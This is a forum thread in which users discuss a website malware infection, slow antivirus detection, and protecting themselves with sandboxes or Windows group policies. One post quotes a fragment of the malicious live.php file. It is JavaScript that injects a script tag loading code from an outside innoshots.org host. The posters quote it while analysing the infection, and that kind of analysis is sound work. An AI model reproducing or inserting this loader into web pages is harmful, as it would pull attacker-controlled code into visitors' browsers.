computerfreaker wrote:
Come on, you've got to be kidding. Why does it take this long for anything to happen...
Tom T. wrote:You get what you pay for?

Naah, I doubt that their paid versions caught it, either. A db is a db.
Guess they don't think that being in the anti-virus business involves anyone working on weekends? Surely no one would introduce a new virus on a weekend, would they?
Given this thing was in the wild for close to a month before they did anything, and its relatives (the rest of the Goored family) have been in the wild for months, I'd say the weekend was long over for them. Not a pretty demonstration of AV "mobility"...
Tom T. wrote:FWIW, today it did flag the sample on my machine as malware when I opened it.
That's good...
computerfreaker wrote:The only thing they got that we missed was live.php... I thought it only redirected to innoshots, but perhaps I'm wrong on that? Any PHP coders on here?
Tom T. wrote:I *did* find it (cough), but reviewing my PMs, you weren't in that loop; apparently two simultaneous loops going.
nope, I wasn't in that particular loop. I got a couple of messages about the infection, but nothing about live.php...
Tom T. wrote:Code: Select all
script=document.createElement('script');script.id="t0";script.src="http://29.innoshots.org/ffeed.php
Redirecting or fetching malicious scripts from third parties certainly constitutes malware.
I saw that in live.php, but didn't think of it as malware.... however, you're right about fetching malicious scripts.
btw, just tried manually loading that feed.php - nothing. I'm guessing I borked up the parameters I passed it... I'm not too sorry about the loading failure, though - I don't feel particularly inclined to load a live piece of malware and see what happens, even though NS is protecting me.
computerfreaker wrote:Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.
Tom T. wrote:At the risk of sounding like a broken record, some sort of effective sandbox will. (Much more effective than a limited user account.)
The one I use clones enough of a Reg hive to support the app being sandboxed (in this case, the browser). So any entries to *any* key or branch are written only to this virtual Registry -- and dumped when the sandbox is emptied. (As we know from my experience in being able to reproduce it one day and not the next.)
Your "real" Registry remains untouched.

Sure, a sandbox offers some level of protection.
But it won't cover everything - what about the legit app that gets hacked? (There was actually a fairly-well-publicized case of this a few years ago - a legit Fx addon got hacked and shipped with malware. The addon author, who was completely innocent, didn't find out until 30,000 people had already downloaded it...)
I think sandboxing needs to come from the OS - I'll drop a new post in Security about this. (We've already had 2 topic splits, I don't see the need to generate a 3rd...

)
GµårÐïåñ wrote:I was going to say earlier, either the sandbox or you can setup (if you know how or care to learn) to setup policy based permissions using local policy on your own profile. Then you can secure it using windows authentication and that way it will only run when YOU have logged in, executes the policy and viola done. Now if you change something mid-session and don't want to restart for it to take effect, go to your command prompt (run as admin if you are in Vista/7) and type: gpupdate -force and remember that you have user policy and machine/system policy (even as a local) so make sure the permissions are set under the right hive. To gain access to the policies, get the policy editor tool provided for 2003/2008 and install it by itself and you will get access to the console that provides the GUI but you can always just type: mmc at the command prompt, when it loads a blank one, just add them from the tools and make your own console, save it and then reuse as needed.
Potent, but complex & somewhat error-prone...
Tom T. wrote:Maybe I'm just lazy

, but I think running Sandboxie is easier.
(Seriously: And within the tech capabilities of many average users, while your solution, excellent though it is, is for only the very high-tech user [and a lot more work.]

) ) Cheers!
Sandboxie is a lot easier, but group policies are far more potent... I reckon it depends on the user's knowledge & level of control over the system.
GµårÐïåñ wrote:Oh yes, agreed. Playing with policies is difficult even for those who have been doing it for 20 years. Sometimes if you are engaging in a complex matrix that has inherited permissions or too many exceptions to the exceptions, you have to be careful because a lower upstream privilege could override a lower more strict one and you may not realize it, opening up a whole world of hurt. Anyway, definitely not easy or user friendly but not exclusive to the elite either, but even those make mistakes doing this, so it should be at the very least studied and kept simple until more familiar. Sandbox would be the easiest way to be honest, no matter the level of expertise; however, unfortunately in the corporate environment, you don't have that luxury and must push policy through active directory and need to control ALOT to be compliant with regulations.
The permissions-overriding thing's bitten me in phpBB3 before - not too hard to fix, but hard to detect in the first place. System permissions are probably even harder to set up...
Tom T. wrote:I didn't see anything in SeanM's or computerfreaker's posts that indicated that they were dealing with a corporate environment; hence, the recommendation of the lower-tech solution. I'm sure your comments will be of value to any corporate administrators here, so thanks for sharing them.
I'm not in a corporate environment, so Sandboxie would work just fine for me...
My turn to sound like a broken record: Sandboxie Portable is better, since it comes from PortableApps.com...

(It's not actually an official PA.c release, but is as "clean" as one - nothing gets left on the system, AFAICT)
With great power comes great responsibility.
Learn something new every day, and the rest will take care of itself.
Life is a journey, not a destination. Enjoy the trip!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5